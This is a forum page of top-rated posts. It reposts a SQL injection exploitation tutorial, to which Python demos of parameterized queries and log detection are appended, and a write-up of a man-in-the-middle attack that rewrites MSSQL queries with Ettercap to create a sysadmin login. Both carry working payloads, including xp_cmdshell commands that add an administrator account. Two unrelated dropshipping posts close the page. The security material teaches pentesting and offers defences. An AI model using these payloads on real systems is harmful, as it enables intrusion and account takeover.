Leaderboard

Popular Content

Showing content with the highest reputation on 02/11/16 in all areas

  1. SQL Injection: Exploitation
Published on February 9, 2016 By HollyGraceful on Injection, OWASP Top 10, Web Application Security

Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query, and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise.

SQL and a SQL Injection Primer

For those less familiar with SQL, it is a language used for storing, retrieving, modifying and removing data from a database. It can often also be used to read or modify files on the remote system and execute operating system commands. There are many variations such as Microsoft SQL, MySQL or PostgreSQL.

There are different query types in SQL, such as SELECT, INSERT, UPDATE and DELETE, as well as the idea of "Stored Procedures". These are used for retrieving data from the database (SELECT), adding new rows to a table (INSERT), taking a table row and modifying it (UPDATE) or removing rows from a table (DELETE). There are many different stored procedures; however, an interesting one is the MSSQL procedure xp_cmdshell, which can be used for executing commands on the remote database host.

SELECT statements retrieve data from the database and look like:

    SELECT column FROM table WHERE condition is true

For example the following could be used for a login system:

    SELECT username,password FROM users WHERE username='$INPUT1$' AND password='$INPUT2$';

Where $INPUT1$ and $INPUT2$ are text taken from the user of the application. Statements are separated by semi-colons, so two statements could be "stacked" and executed one after the other by separating them with a semi-colon. Developers can add comments into a statement by preceding the comment with a " -- ", which makes the SQL parser ignore any following text.

The above statement concatenates user input into the query and is therefore vulnerable to SQL injection, as an attacker can simply add characters within $INPUT1$ or $INPUT2$ to alter the logic of the statement. Taking this into account, an attacker could utilize the following payload for INPUT1 to cause a login bypass:

    x' OR 1=1 --

This works as the input would change the command to the following:

    SELECT username,password FROM users WHERE username='x' OR 1=1 -- ' AND password='$INPUT2$';

As you can see from the above, the double dash has caused the password check to be "commented out" so that it has no effect. Also, if you remember back to the first SQL command I showed, it highlights that the SELECT statement evaluates the WHERE clause to determine if it is a Boolean true. That's what the OR 1=1 part of the input achieves, as one always equals one. The effect on many applications that are vulnerable to SQL injection in the login form is that all account data will be returned and the database will simply log the attacker in as the first user in the database.

As you can see, the attacker has altered the intended logic of the statement and they could use this to bypass authentication, cause the database to leak confidential information or even execute functions such as executing operating system commands.

Many times it can be tempting to leave SQL exploitation down to automated tools, but I recommend all junior Penetration Testers get as deep into manual exploitation as they possibly can so that they can really understand what the tool is up to, especially in preparation for the day that the tool fails and you've got to crack a can of caffeine and do it all manually.

Detecting Vulnerable Functions

Detecting SQL injection is fairly simple if errors are enabled and displayed in raw form to the user. If an attacker adds an apostrophe to the input it will cause an unbalanced number of quote marks and an error like "You have an error in your SQL syntax" will be shown. Great, you have a valid SQL injection point! However, if errors are customized or simply not rendered to the user then you have to try a little harder. The most effective way to do this is to alter the query in such a way that it could only possibly be that you have successfully injected into SQL: so, very SQL-like syntax being parsed in the expected way.

Consider the following query which loads a news article from the database to display on a fictitious web application:

    SELECT id,title,content FROM tblArticles WHERE id=$input

Which is accessed through the following URL:

    http://sql.example.org/news?id=100

Now a simple way to determine if the parameter "id" is vulnerable to injection would be to try the following URLs and see how the server reacts:

    http://sql.example.org/news?id=100
    http://sql.example.org/news?id=101
    http://sql.example.org/news?id=101-1

If the server is appropriately vulnerable it would be expected that the first and second URL show different articles, whereas the third one is evaluated by the database and produces the same output as the first URL. If the statement 101-1 is not evaluated then there'll be a notable change in output.

The above example, obviously, will only work on integer inputs. If the id parameter was instead a string input like this:

    http://sql.example.org/news?page=example

With the above case it's possible to utilize string concatenation in a similar way, where if the string is evaluated and concatenated then the output should not change, whereas if it is not evaluated then a noticeable change in output will occur. The method of concatenation differs between back-end database types; however, if one works you have the added benefit of fingerprinting the database type!

    MSSQL:  exa'+'mple    (with URLs a + is a space, use %2b instead, the URI encoded plus sign!)
    MySQL:  exa' 'mple    (that's a space between two apostrophes)
    Oracle: exa'||'mple

An additional way of detecting functions that are vulnerable is to concatenate a simple conditional at the end of the input, such as:

    AND 1=1 --
    AND 1=2 --

The idea with these payloads is that the top option of 1=1 will not alter the logic of the query in any way (as 1 does in fact equal 1), although the second payload will break the query and therefore the application would operate in a noticeably different way, such as missing text on the page (and therefore a shorter content length), a faster response time, a visible error or a different status code. The application should also have the same effect regardless of what the conditional was, so 1=1, 2=2 and 3=3 should all have the same effect, as should payloads such as:

    AND (SELECT @@version)=(SELECT @@version) --

The above payload is useful because it's very SQL-like, and whilst there may be some application logic which interprets 1=1, it's very unlikely that outside of a SQL injection context you'll get the same response from the above payload. It's important to note, however, that this payload is vendor specific, so the above will work on MSSQL and MySQL but not PostgreSQL. There's a suitable payload for each of the backends however. The PostgreSQL equivalent would be:

    AND (SELECT version())=(SELECT version()) --

Types of Injection

Whilst the above example is a simple demonstration of SQL and how injection can be used to the benefit of an attacker, as the attacker has the full flexibility of SQL at their disposal there is much more that they can do than simply bypassing an application's login form. The different types of injection covered within this article are:

    Boolean
    Error
    Union
    Stacked
    Time

In terms of injection it's not exactly a case of preference but simply what is available in the context of the vulnerable parameter. You'll definitely prefer to find Union or Error based over Boolean and Time based due to the effort levels required to exploit them, but you'll have to deal with what you're given when it comes down to it. Different injection types will be available depending on the original query which you are injecting into, as well as any filters that are in place to prevent malicious input.

Exploitation

There are five injection types and I'll cover them each in turn. Once you get the hang of the first, however, the others operate much as you'd expect, but I'll run through a full working example of each to make sure there are no important details missed out, plus it'll show how I generate payloads and build up from detection to data exfiltration.

Error Based

Error-based SQL injection comes about when errors from the SQL database are exposed to the attacker by being embedded in application responses. Detection is generally as simple as placing an apostrophe in the parameter and you'd receive an error along the lines of:

    Microsoft SQL Native Client error '80040e14'
    Unclosed quotation mark after the character string

The exact error depends on the backend database. These errors can be controlled, and by crafting input you can cause the error to contain data from the database itself. For example, if you are injecting into an integer input you can cause a type clash which will disclose information like this:

    AND 1 in (SELECT @@version)

With input like this you'll get an error along the following lines:

    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)' to data type int.

This works as the database attempts to convert the string to an integer, cannot, and throws an error that reveals the information. This means that an attacker can place any select statement that returns a string within the brackets of the payload and the error will contain the desired output. However, it's a touch more complex if you're injecting into a string, but only a touch. As you couldn't cause a cast error by converting to an integer, you can expand the payload to be something along these lines:

    AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) --

Here you can replace (SELECT 1) with the SQL statement you would like to execute and retrieve the contents from. The way that this injection works is to concatenate the desired data onto the end of the string "Extract:" and then attempt to cast that to an integer, which causes an error, so in the case of the example the resulting error would be:

    Error Type: Microsoft SQL Native Client (0x80040E07)
    Conversion failed when converting the varchar value 'Extract:1' to data type int.

So an attacker can effectively run arbitrary SQL statements and capture the output easily if errors are embedded within the application. If errors are gracefully handled, however, this doesn't stop an attacker completely; they just have to use a different injection technique.

Union Based

The UNION operator allows two or more SELECT statements to be combined, the idea being that a developer may run a query such as listing all of the products available in a store and an attacker can combine this with an additional query, such as listing all of the usernames and passwords in the customers table. To utilise a union though, the attacker must request the same number (and type) of columns as the original query and therefore needs to know how many columns are being used. There are two ways to do this. The first is to use NULLs in place of the columns to determine how many columns there are, such as:

    UNION SELECT NULL --
    UNION SELECT NULL, NULL --
    UNION SELECT NULL, NULL, NULL --
    UNION SELECT NULL, NULL, NULL, NULL --
    UNION SELECT NULL, NULL, NULL, NULL, NULL --
    UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --
    UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL --

…and continue until you've determined how many columns there are. If you get the incorrect number of columns an error condition will occur, and if you get the right number then the application will run unhindered. You can then swap out the NULL with datatypes to determine which ones are correct, such as:

    UNION SELECT 'abcd', NULL, NULL, NULL --
    UNION SELECT 1, NULL, NULL, NULL --

Work them out one at a time until you end up with something like this:

    UNION SELECT 1, 'string', 'string', 'string' --

At this point you have a working SELECT statement where the output will be appended to the normal output the application gives!

If you've got a lot of columns and writing out all of those NULLs is too much like hard work, there's another method of doing the original column count enumeration, using ORDER BYs. If you attempt to order by a column number which is higher than the number of columns it'll throw an error. So you can start low and work up until you see an error:

    ORDER BY 1 --
    ORDER BY 2 --
    ORDER BY 3 --
    ORDER BY 4 --

Blind Boolean

If the application gracefully errors, and it's not possible to combine queries with UNION, then an attacker can use inference to determine the answer to queries about the database. The payloads we used earlier to prove the existence of injection are simple examples of this:

    AND 1=1 --
    AND 1=2 --

Essentially these are asking yes or no questions of the database and the result shows the answer. "Does 1=1?" Yes of course it does, and therefore the normal output of the application will be visible. "Does 1=2?" No it does not, and therefore there should be a noticeable change; this could be in the response length, time of execution, or HTTP response code (just like before). However, we can expand upon this idea to ask more in-depth questions of the database, as long as we can phrase them as Yes/No questions. For example, "Is the first letter of the current user the letter 'a'?" That'd look something like this:

    AND SUBSTR(SELECT user_name(), 1, 1)='a' --

We can cycle through b, c, d, e until we get a "true" response, then move on to the second character and so on. A time consuming and request intensive process, but it can be automated quite easily with python (or Burp Intruder!).

Time-Based Blind

If the application does not embed responses so you can't use UNION, if it doesn't show error messages and it's not possible to determine the output of a boolean, then there is still hope! If you can't infer the output of a boolean through application responses you can add a notable difference yourself through time delays. Effectively, using IF statements and delays you can ask the application "Does A=A? If so, please delay your response by five seconds and if not then immediately respond". Then by detecting lag in the response you'll get your answer! Simple…but very time consuming…

A payload like this will work for MSSQL:

    IF('a'='a') WAITFOR DELAY '0:0:5' --

Then you can simply replace the 'a'='a' with whatever yes/no question it was that you'd like to ask.

Stacked Queries (and possibly command execution!)

A final thing which is worth noting is that it may be possible to close off the developer's query and start a completely new query from scratch, something as simple as:

    ; WAITFOR DELAY '0:0:5'; --

If this works you'll get a delay as you did in the previous example; however, as you're able to execute new full queries it is also potentially possible to execute stored procedures, such as xp_cmdshell on MSSQL. This stored procedure allows for the execution of operating system commands on the database server. There are two problems. The first problem is, on modern MSSQL servers xp_cmdshell is disabled by default…but you can re-enable it through SQL Injection! The second problem is that to execute this procedure, you probably need to be running as the sa user. If you're lucky though and you are sa, here are the steps to execute OS commands:

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;

Now that's done, you can go ahead and use xp_cmdshell:

    exec master..xp_cmdshell 'dir c:\'; --

That'll execute the dir command! One…small hitch…the output of the command isn't returned…an easy way to get around that would be to just attack the application blind, for example:

    exec master..xp_cmdshell 'net user foobar Password123 /add'; --
    exec master..xp_cmdshell 'net localgroups "Administrators" /add'; --

The above command adds a new local administrator to the remote server. That might help. Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection! You can create a table and store the output of a command to it with the following:

    ; create table #output (id int identity(1,1), output nvarchar(255) null);
    ; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:';

Then read the contents out with a SELECT statement like this one:

    ; select * from #output where output is not null order by id;

A quick note on filter evasion…

If there's a filter in place to prevent the execution of the payloads above then there are a few things to try. First of all, be aware that you can flip case without any problem:

    SELECT
    sElEcT

Also if whitespace is filtered, then you can replace spaces with comments for the same effect:

    AND 1=1 --
    /**/AND/**/1=1/**/--

Finally, if you can't comment out the end of a query you can "gracefully close" the statement instead:

    ' AND 1=1 --
    ' AND 1=1 OR 'a'='a

Defending against Injection

As I said at the start of this article, the issue really is that user input is insecurely concatenated into a query. So there are two things to note here. The first is concatenation, and the fix here is instead to use "parametrized" or "prepared" statements. These are available in all modern languages and frameworks; they effectively separate the query from the user input so that the database cannot mix the two up, and effectively stop SQL injection attacks on their own. An example for PHP can be found in the PHP documentation here, which gives a flavour of the general idea. However, another thing to consider, to stop other kinds of injection and web application attack, is that it's a good idea to consider filtering all user input. I've written about user input filtering tactics here.

Source: https://www.gracefulsecurity.com/sql-injection-exploitation/
    3 points
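The login bypass and the 101-1 probe described in the post above, as an added example that is not part of the original article: a Python script (assumptions: an in-memory SQLite database with constructed users and tblArticles tables standing in for the article's MSSQL examples) that runs each concatenated query beside its parameterized form, so the difference in behaviour the article describes can be observed directly.

```python
import sqlite3


def make_db():
    """Constructed sample data: tiny users and tblArticles tables standing in
    for the article's MSSQL examples (SQLite in memory, runs offline)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    conn.execute("CREATE TABLE tblArticles (id INTEGER, title TEXT, content TEXT)")
    conn.executemany("INSERT INTO tblArticles VALUES (?, ?, ?)",
                     [(100, "First article", "..."), (101, "Second article", "...")])
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """The vulnerable pattern from the article: input spliced into the SQL text."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The fix: placeholders. The values travel separately from the query
    text, so an apostrophe or -- inside them is only data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


def article_concatenated(conn, id_param):
    """Integer parameter concatenated, as in the article's WHERE id=$input."""
    return conn.execute(
        "SELECT id, title FROM tblArticles WHERE id=" + id_param).fetchone()


def article_parameterized(conn, id_param):
    """Same lookup with a bound parameter: '101-1' stays an opaque string and
    is never evaluated as arithmetic."""
    return conn.execute(
        "SELECT id, title FROM tblArticles WHERE id=?", (id_param,)).fetchone()


def observe(fn, conn, value):
    """What a client would see: ('ok', row) or ('error', raw DB error text).
    A raw database error reaching the client is the error-based signal."""
    try:
        return ("ok", fn(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    bypass = "x' OR 1=1 -- "
    print("concatenated login :", login_concatenated(conn, bypass, "anything"))
    print("parameterized login:", login_parameterized(conn, bypass, "anything"))
    for value in ("100", "101", "101-1", "100'"):
        print(value, observe(article_concatenated, conn, value),
              observe(article_parameterized, conn, value))
```

With the concatenated login, the bypass payload returns the first row of the table (the effect the article describes); with the bound parameters the same input simply matches no user. For the article lookup, `101-1` returns article 100 only when the parameter is concatenated, and an apostrophe raises a raw syntax error only on the concatenated path, while the parameterized query treats both as strings that match nothing. SQLite's dialect differs from MSSQL in details (no `@@version`, different error text), but the concatenation-versus-binding behaviour is the same.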
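Added example, not from the original article: a log-side detector for the probing patterns the post lists (101-1, AND 1=1 / 1=2, @@version, UNION SELECT NULL, ORDER BY n, WAITFOR DELAY, the `'+'`, `' '` and `'||'` concatenations) run over constructed Apache common-log-style access log lines. The log lines, IP addresses and rule names are constructed for this example; the normalisation step undoes the case-flipping and `/**/`-as-whitespace evasions the post mentions, and the query string is decoded by hand so that `%2b` becomes a literal `+` and a `;` is never treated as a parameter separator.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log sample (documentation-range IPs). Lines 2 to 8 carry
# the probes described in the post; line 10 is a benign apostrophe.
LOG = """\
203.0.113.5 - - [11/Feb/2016:10:00:01 +0000] "GET /news?id=100 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Feb/2016:10:00:02 +0000] "GET /news?id=101-1 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Feb/2016:10:00:03 +0000] "GET /news?id=100%27 HTTP/1.1" 500 310
203.0.113.5 - - [11/Feb/2016:10:00:04 +0000] "GET /news?id=100+AND+1%3D2+-- HTTP/1.1" 200 90
203.0.113.5 - - [11/Feb/2016:10:00:05 +0000] "GET /news?id=100+AND+%28SELECT+%40%40version%29%3D%28SELECT+%40%40version%29+-- HTTP/1.1" 200 5120
203.0.113.5 - - [11/Feb/2016:10:00:06 +0000] "GET /news?page=exa%27%2b%27mple HTTP/1.1" 200 5120
203.0.113.5 - - [11/Feb/2016:10:00:07 +0000] "GET /news?id=100/**/UNION/**/sElEcT/**/NULL,NULL-- HTTP/1.1" 500 310
203.0.113.5 - - [11/Feb/2016:10:00:08 +0000] "GET /news?id=1;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1" 200 5120
198.51.100.7 - - [11/Feb/2016:10:00:09 +0000] "GET /news?id=102 HTTP/1.1" 200 4870
198.51.100.7 - - [11/Feb/2016:10:00:10 +0000] "GET /search?q=O%27Brien HTTP/1.1" 200 2200
"""

# One rule per technique from the post; patterns run on the normalised value.
RULES = [(name, re.compile(rx)) for name, rx in [
    ("union-column-enum", r"\bunion\s+(all\s+)?select\b"),
    ("order-by-enum",     r"\border\s+by\s+\d+"),
    ("boolean-probe",     r"\b(and|or)\s+\d+\s*=\s*\d+"),
    ("version-probe",     r"@@version|\bversion\(\)"),
    ("stacked-query",     r";\s*\w"),
    ("time-delay",        r"\bwaitfor\s+delay\b|\bsleep\s*\(|\bpg_sleep\b"),
    ("cmd-exec",          r"\bxp_cmdshell\b|\bsp_configure\b"),
    ("string-concat",     r"'\s*(\+|\|\|)\s*'|'\s+'"),
    ("arith-probe",       r"^\d+\s*[-+*/]\s*\d+$"),
]]

LINE_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def normalise(value):
    """Undo the evasions from the post: /**/ used as whitespace, case flipping."""
    return re.sub(r"/\*.*?\*/", " ", value).lower()


def classify_value(value):
    """Return the names of every rule the parameter value triggers."""
    v = normalise(value)
    tags = [name for name, rx in RULES if rx.search(v)]
    # A lone apostrophe is the weakest signal (see O'Brien below), so it is
    # reported separately rather than folded into the rules above.
    if v.count("'") % 2 == 1:
        tags.append("unbalanced-quote")
    return tags


def query_params(target):
    """Decode the query string ourselves: '+' becomes a space, %2b becomes
    a literal '+', and ';' is never a separator."""
    for field in urlsplit(target).query.split("&"):
        if field:
            name, _, value = field.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def scan_access_log(lines):
    """Return (client_ip, parameter, decoded value, tags) per flagged parameter."""
    hits = []
    for line in lines:
        m = LINE_RX.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for name, value in query_params(target):
            tags = classify_value(value)
            if tags:
                hits.append((ip, name, value, tags))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(LOG.splitlines()):
        print(hit)
```

Eight of the ten constructed lines are flagged; the last of them (`O'Brien`) shows why the apostrophe rule is kept separate, since a single quote in a name field is routine and is only worth attention in combination with the other tags or with a 500 status on the same request.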
  2. I make more than at my job, but I'm not ready to quit; you realise that tomorrow it might stop working for me, or my distributors might run out of stock, etc... and my job still gives me around 900 euros, which is acceptable in Romania. First I'll save up and build myself a base, gain knowledge, and then I'll leave the job too.
    3 points
  3. By Rick Osgood | February 5, 2016 During a recent penetration test, I was performing some packet captures and noticed some unencrypted Microsoft SQL Server (MSSQL) traffic. The syntax was unmistakable. At first I thought this might be a way to capture some authentication credentials. However, MSSQL encrypts login traffic which meant I would have to crack the encryption to get credentials. If the installation uses a self-signed certificate, that is fairly easy to crack. Unfortunately, for this particular client engagement, cracking SQL Server encryption was beyond the scope of the project. So, I had to set my curiosity aside for the time being and complete the penetration test for the client. However, I could not help thinking I was on to something. Was there a way to attack a SQL Server box without any credentials? I decided to take my hypothesis to the lab and try some experiments. What I found was that with a little packet hacking, I could take control of a Microsoft SQL Server box without having any stolen credentials using a Man in the Middle style attack. Man in the Middle Back in my lab, I began to research this more. For my investigation, I was running MSSQL Server 2014 Express on Windows Server 2012 R2. The client machine was a Windows 10 system running MSSQL Management Studio 2014. My attack machine was a relatively new installation of Kali 2.0 Linux. All of these systems are on the same subnet, simulating an attacker on the internal network. This was nearly identical to the setup I had at the client site. This type of attack is known as a man-in-the-middle (MITM) attack. Anitian does these a lot, as we have a lot of expertise on hacking infrastructure devices. The typical setup is to perform some kind of redirect, like an ARP cache poison (which is still possible in some environments), which forces traffic between two systems to be redirected through the attacker’s computer. 
This allows the attacker to not only see all of the data between the victims, but potentially also to manipulate that traffic. This was exactly what I wanted to do. Understanding the Data The first thing I needed to do was to look at the MSSQL query traffic. In order to make this test more interesting, I used the “SA” account to login. The SA account is the system admin account in SQL Server and can do anything. If my experiments were successful, I could do a lot of fun things with the SA account’s privileges. Once logged in, I launched Wireshark 2.0 on the SQL Server box. It started capturing traffic on the primary interface. I configured Wireshark to use a display filter “tds.query”. This hides all the other traffic and displays just the TDS query packets. (Incidentally, I noticed that the “tds.query” filter object is not available on older versions of Wireshark.) With a traffic capture underway, I switched back to the workstation and executed a query against the sample database I built for this test. The database is called testdb and includes one table called Products. The Products table has two columns named ProductID and ProductName. There is no actual data in the table, but for this test that is unnecessary. This query is designed to pull all information from the database table. The query was executed successfully and the empty table was returned to me. You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet. Clicking on that packet showed me all of the data contained within. MSSQL Server 2014 Express did not have encryption enabled by default, so this data was easy to access. Looking at the decoded data at the bottom of the center pane, it is easy to identify the query. It even includes the carriage return and newline characters. 
Something interesting to notice is that in between each character of the query is a null byte (hexadecimal 0x00) which is normal for Unicode. This is only noticeable when looking at the raw data in the bottom pane. Wireshark displays these bytes as period characters but really, they are null. This meant that I couldn’t just look for a simple string like “select”. I’d have to take those Unicode null bytes into consideration when searching for the data later, and for when I ultimately try to replace it with my own data. Fun with Ettercap Filters Now that I knew what the data looked like, I could try to find a way to manipulate it. I decided to use Ettercap. Ettercap is a tool specifically designed to perform MITM attacks. It also has a nifty built-in feature called Ettercap filters. A filter would allow me to search the packets for specific data and then manipulate that data. You just write the filter and load it into Ettercap. Then Ettercap automatically replaces data every time it finds a match. The functionality is somewhat limited, but it should work for proof of concept. The filters are written in a simple scripting language. The important functions I intended to use were the search and replace functions. The search function will search for specific data within the packets. The replace function will actually search for data and then replace it with other data. That was the key to this project. Since the TDS query data includes those null bytes, some of the characters are not printable. This meant that I could not merely search for a simple string and replace it with another string. I needed a way to search for a non-printable null byte. Since I cannot type null on a keyboard, I needed another way. Fortunately, Ettercap filters support hexadecimal using “\x” to escape. For example, to search for the letter ‘s’, I can tell Ettercap to search for “\x73”. The null bytes are easily searchable now by searching for “\x00”. 
Kali includes a program called hexdump that can be used to convert strings to hexadecimal. I used this to convert the string “select” to hex. Once I had the data I needed, I wrote the first test filter and called it “mssql.filter”. The first line ensures that the filter will only run on TCP traffic with a destination port of 1433. If this matches, the filter will output a debugging message to the console to let me know that it found SQL traffic. This is just for my own peace of mind so I know it’s at least partially working. The next “if” statement searches for a string of hex data. This data translates to “select” with null bytes in between each character. If the filter locates that string, it will output another debugging message to the console. Finally, the magic happens. The replace command swaps that exact string with a different string of “ssssss” including the required null bytes. This was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with the exact same number of bytes. If the size of the packet changes, the TCP connection will break. Once the filter is written, it must be compiled. This is easily accomplished with the etterfilter command. There were no errors, so the filter was now ready for testing. I fired up the Ettercap graphical interface and launched an ARP spoofing attack against the MSSQL server and the client workstation with sniffing enabled. I fired up Wireshark and verified that I was seeing traffic being sent between the two victims. Then in Ettercap I went to “Filters -> Load a filter” and chose my filter. I was rewarded with a “Content filters loaded” message down in the Ettercap console. Almost immediately I was receiving “SQL Traffic Discovered” messages as well. Everything was looking positive. The next step was to switch back to the workstation and try executing the query. 
If it goes according to plan, the “select” string should be replaced with “ssssss” and break the query. I executed the query, but this time I did not receive the empty table result like I did originally. Instead, I received an error. “Incorrect syntax near ‘ssssss’.” That’s perfect! The filter worked exactly as expected. It replaced the “select” string with “ssssss”. The MSSQL server did not know how to handle that and returned an error. That was one step in the right direction. The next step was to replace the entire query string with something that will help me as the attacker. Create the Login I decided to try to add a login to the server. This would be pretty much the best possible scenario for me as an attacker, especially since in this case the workstation victim is logging in as the SA user. In order to add a login, I would have to submit this query to the MSSQL server: CREATE LOGIN anitian WITH PASSWORD=’YouGotHacked1#’; This would add a user to the MSSQL server called “anitian” with the password “YouGotHacked1#”. After converting everything to hex, I updated the mssql.filter file to contain the new data. This filter will search for the string “select ProductID, ProductName from Products where ProductID=1;” and then replace it with the string “CREATE LOGIN anitian with PASSWORD=’YouGotHacked1#’”. I mentioned earlier that you must replace TCP data with the exact same amount of data. So how did I handle that since my new query is shorter than the original? I just added some spaces to the end of my new query with the null bytes surrounding them. This would ensure that the TCP packet stayed the same size, but the spaces wouldn’t interfere with my query being executed successfully. I compiled the filter just like before and then loaded it up into Ettercap. Then I submitted the query from the workstation. Notice the difference between this response and the response before I used the Ettercap filter? Originally, the query returned an empty table. 
This time, no table was returned. Instead, the server returned a message, “Command(s) completed successfully.” If a database administrator saw this, they would likely dismiss it as some strange error. Unfortunately, they would be too late. I just added my own account to the database system. Now, the real hack was about to take place. From the Windows 10 workstation I logged out of the SA account and then attempted to log in using my (hopefully) newly created anitian account. SUCCESS! I was now logged in with my own account. Unfortunately this account did not have a lot of rights, so I could not do much. However, that could be solved. The next step would be to prepare another Ettercap filter to adjust my account’s rights and then perform a second SQL query injection attack. At this point, I could have easily done all this, but it is rather tedious to do all the hex conversions by hand, and then add all of those null bytes and such. Who wants to go through all of that effort? This was a good enough proof of concept right? No way! I was not about to give up that quickly. Besides, why do all that tedious work, when I can automate the entire process using a script! Automating the Hack The SQLinject.sh shell script can be downloaded here: http://pastebin.com/Nge9rx7g This script automates the entire process from converting the SQL queries to hex all the way to performing the ARP spoofing and loading the Ettercap filter. It makes the process extremely easy. In order to use the script you need four pieces of information. The IP address of the MSSQL server The IP address of the MSSQL client The original query you want to replace The new query you want to inject In this case, I already knew everything except for the SQL query I wanted to inject. I knew I wanted to give the anitian user sysadmin privileges. 
After a quick lesson in SQL commands, I was able to design with the correct query: ALTER SERVER ROLE sysadmin ADD MEMBER anitian; This would add my new anitian user to the sysadmin role on the server, giving me access to pretty much anything I want. Now that I had all four key pieces of information, I ran the script like this: ./SQLInject.sh –o “select ProductID, ProductName from Products where ProductID=1;” –i “ALTER SERVER ROLE sysadmin ADD MEMBER anitian;” –s 192.168.1.114 –c 192.168.1.100 –f mssql.filter Using the script, I do not have to worry about those pesky hex conversions or null bytes. The script handles it all for me. It will perform the conversions and then output an Ettercap filter to mssql.filter (The filename is based on the –f flag). From there, it runs etterfilter and compiles the filter into mssql.filter.ef. Finally, the script even loads up the command line interface to Ettercap, performs the ARP spoofing attack against the server and workstation and loads the filter! It will even compare the length of the old query and the new query and warn you if the new query is too long. And if the queries are not an identical length, it will pad the new one with spaces to make them identical in length! One single command does everything for me. I executed the script and then switched over to the workstation. I then ran the familiar select query and noticed that I once again received the “Command(s) completed successfully” message. This was a good sign for the attack. I logged out of the SA account and logged back in as anitian. Ta da! You can see in the screenshot that the anitian account is now a sysadmin user. With this level of access I can do whatever I want with the system. It gives me a great pivot point to start attacking other systems on the network. Of course, that assumes this database does not already contain what I am looking for like payment card numbers or personally identifiable information. 
The biggest downfall to this script is that it requires you to know the original SQL query before it actually happens. Luckily, SQL servers often have batch jobs or queries that are executed regularly or on a set schedule. Watching a Wireshark capture over a period of time should result in at least one query you can target. Of course I could always turn this into a more full-fledged program that performs the MITM attack on its own and then actually proxies the traffic, searching for TDS query packets by type and then automatically replacing the data without the need to know the original query beforehand…but that’s a project for another day. Defending Against SQL MITM Attacks Man in the middle attacks such as this can be devastating. As you can see, I was able to gain complete access to a critical system. A focused hacker may not follow some of the scientific processes I did. Moreover, they could automate this and do it repetitively for hours or days, waiting for just the right conditions. The simplest way to prevent this attack is to require encryption on all database connections. However, merely enabling encryption might not be sufficient. Clients can negotiate the connection with no encryption if it is not required. Also ensure that you use a valid, trusted certificate. An attacker could easily spoof a self-signed certificate. Another defense is to ensure remote queries never use accounts with elevated privileges, such as the SA account. All database queries, especially the programmatic ones, should use an account with the absolute least amount of access they need to do the job. This ensures that if the attacker is able to take over a connection, they cannot use that connection to forge accounts, like I did in this test. Lastly, ensure your infrastructure is patched regularly. Also, segment and isolate database systems from the corporate network. These are best practices that also make MITM type attacks very difficult (if not impossible) to execute. 
Source: https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/
    3 points
  4. Hi, we have discussed this subject before; I think some topics were unfortunately lost, but the forum update is a good sign, articles can be written anytime. For those of you who have written to me lately here, on Skype, Facebook etc., I will try to answer here, since the forum is public, maybe it helps others too. I won't go over again what I do and how I do it, I'll try to answer a few questions.

1) Do you need a company to start a dropshipping business? If you want it to be a serious thing, I recommend you set one up; at the beginning you won't need it, but over time you will be moving more and more money and you will need a company, PayPal will start asking questions and it will become stressful.

2) What knowledge do you need? Computer use and intermediate English. You do indeed need an online store, but there are 100000+ tutorials, you don't need special knowledge, or you can use Shopify!

3) Where do I get the products from? From anywhere! That is, if you don't own a company. If you have a company, which I also recommend, suppliers can be found: there are marketplaces for this, one example is Doba. If you don't have a company and are still looking for a supplier, you can take a look here: http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/

4) How much time do you need, I also have a job..and... Me too, yes, I also have a job; it is indeed easier, but I have an 8-hour schedule and still somehow manage to take care of dropshipping too. I prefer to have a job and also work on my business, until I save enough money to invest in something better, or to expand what I already have.

5) I have a site, I have planned everything, but I have nobody to sell to! The method with money + fast: you spend money to make money! = Facebook Ads, Google AdWords, SEO campaigns. The method without money: social media pages -> sharing in all the groups in your niche + "Buy & Sell" type groups, follow 4 follow, pin, etc...it depends on the network.

SEO -> I think you can optimize the pages yourself without anyone's help, there is far too much information on the internet; then you can passively start building backlinks, social signals, etc.

6) What payment systems do you use?! Before having a company I used only PayPal, because it lets those who don't have an account pay by card as well; now I have a company and have integrated almost all the systems: card, PayPal, Western etc.

7) How much should I raise the product prices?! My formula: PRODUCT PRICE + PRICE OF THE FASTEST SHIPPING + 20 - 40 % - this also depends on the value of the product.

